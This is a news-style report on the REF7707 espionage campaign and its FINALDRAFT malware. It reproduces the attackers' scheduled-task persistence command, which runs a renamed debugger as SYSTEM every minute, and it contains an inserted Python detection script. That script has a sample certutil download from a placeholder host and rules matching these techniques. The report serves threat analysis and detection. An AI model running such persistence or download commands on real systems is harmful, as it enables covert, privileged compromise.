Hackers Target Windows and Linux with FINALDRAFT Malware


Elastic Security Labs recently disclosed a sophisticated hacking campaign, dubbed “REF7707,” that has been targeting both Windows and Linux systems using novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER. The campaign is notable for its advanced tactics and its poor operational security, which led to the exposure of additional adversary-owned infrastructure.

The REF7707 campaign was first identified in late November 2024, when Elastic Security Labs observed a cluster of endpoint behavioral alerts at the Foreign Ministry of a South American country. The investigation uncovered a sprawling campaign with novel malware, sophisticated targeting, and a mature operating cadence. Elastic Security Labs noted that, despite showing high technical competence in some areas, the attackers made tactical oversights that exposed pre-production malware samples and infrastructure.

Execution Flow

The primary execution chain began with the use of Microsoft’s certutil application to download files from a remote server. FINALDRAFT, a key component of the REF7707 intrusion set, has both Windows and Linux variants. It uses an uncommon LOLBin (Living Off The Land Binary) tactic, abusing the Windows-signed debugger CDB.exe renamed as fontdrvhost.exe. This binary executes malicious shellcode delivered via a weaponized config.ini file. Behavioral analysis revealed that FINALDRAFT injects shellcode into processes like mspaint.exe or conhost.exe if no target parameter is provided.

Persistence was achieved using a Scheduled Task that invoked fontdrvhost.exe every minute as SYSTEM with the following command:

schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM

FINALDRAFT establishes command and control using Microsoft’s Graph API, blending in with legitimate organizational traffic and evading network-based detection. The campaign heavily utilizes cloud and third-party services for command and control, with domains like support.vmphere[.]com and update.hobiter[.]com identified in the malware samples.
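The host-side steps of this chain (certutil fetching from a remote server, CDB.exe running under another name with a command file, and a minutely SYSTEM task launched from C:\ProgramData) each leave a distinct process-creation record. The following is an added example, not code from the article or from Elastic Security Labs: it runs four checks over constructed events, and the Sysmon-style field names, the "CDB.Exe" original-file-name value and the example.test URL are assumptions.

```python
import re
from ntpath import basename

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -urlcache -f https://files.example.test/a.bin C:\ProgramData\a.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -hashfile C:\Temp\setup.msi SHA256"},
    {"Image": r"C:\ProgramData\fontdrvhost.exe", "OriginalFileName": "CDB.Exe",
     "CommandLine": r"C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData"},
    {"Image": r"C:\Windows\System32\fontdrvhost.exe", "OriginalFileName": "fontdrvhost.exe",
     "CommandLine": "fontdrvhost.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager" '
                    r'/tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini '
                    r'-o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM'},
]

def detect(event):
    """Return the rule names one process-creation event matches."""
    image = basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "").lower()
    hits = []
    # certutil given a URL: the download step the execution chain starts with.
    if original == "certutil.exe" and re.search(r"https?://", cmd):
        hits.append("certutil_url")
    # PE metadata says CDB, but the file on disk carries another name.
    if original == "cdb.exe" and image != "cdb.exe":
        hits.append("renamed_cdb")
    # CDB told to run a command file (-cf), as with the weaponized config.ini.
    if original == "cdb.exe" and re.search(r"\s-cf\s", cmd):
        hits.append("cdb_command_file")
    # Task created to run every minute as SYSTEM from C:\ProgramData.
    if (original == "schtasks.exe" and "/create" in cmd
            and re.search(r"/sc\s+minute\b", cmd)
            and re.search(r'/ru\s+"?system\b', cmd)
            and re.search(r'/tr\s+"?c:\\programdata\\', cmd)):
        hits.append("minutely_system_task_programdata")
    return hits

def scan(events=EVENTS):
    """Map event index to matched rules, skipping events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := detect(e))}

if __name__ == "__main__":
    for index, rules in scan().items():
        print(index, basename(EVENTS[index]["Image"]), rules)
```

The genuine fontdrvhost.exe in System32 and the certutil hashing call produce no hits, because the checks key on the original file name and on the command-line shape, not on the image name alone.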

Security Implications and Countermeasures

The use of FINALDRAFT across both Windows and Linux platforms illustrates the need for robust cross-platform security measures. This tactic of exploiting legitimate software to cloak malicious activities shows that traditional network security measures are not sufficient on their own. Organizations must adopt advanced endpoint detection and response (EDR) solutions that can detect and mitigate such sophisticated threats. Furthermore, regular updates to threat intelligence databases and continuous monitoring of network traffic are crucial to identify and block malicious communications promptly.

In addition, companies need to implement strict access controls and ensure that only essential personnel have elevated privileges within their networks. Even sophisticated attacks like REF7707 can be thwarted if attackers are deprived of the ability to move laterally within a network. Regular security training for employees can also help in identifying phishing attempts and other common attack vectors. As attackers continue to develop new techniques, the collaboration between cybersecurity firms and organizations becomes even more vital. By sharing threat intelligence and best practices, the collective defense against such advanced threats can be strengthened.

Conclusion

FINALDRAFT’s deployment on both Windows and Linux highlights the necessity of strong cross-platform security. The practice of using legitimate software to mask harmful activities proves that traditional network security measures are insufficient alone. Organizations need to adopt advanced endpoint detection and response (EDR) solutions capable of detecting and countering such advanced threats. Additionally, it’s vital to keep threat intelligence databases updated and consistently monitor network traffic to quickly identify and block malicious communications.

Firms must also enforce strict access controls, ensuring that only crucial personnel have elevated network privileges. Even advanced attacks like REF7707 can be prevented if attackers can’t move freely within the network. Continuous security training for employees can aid in recognizing phishing attempts and other frequent attack methods. As cybercriminals evolve, collaboration between cybersecurity firms and organizations becomes even more critical. By sharing threat intelligence and best practices, we can collectively strengthen our defense against these sophisticated threats.
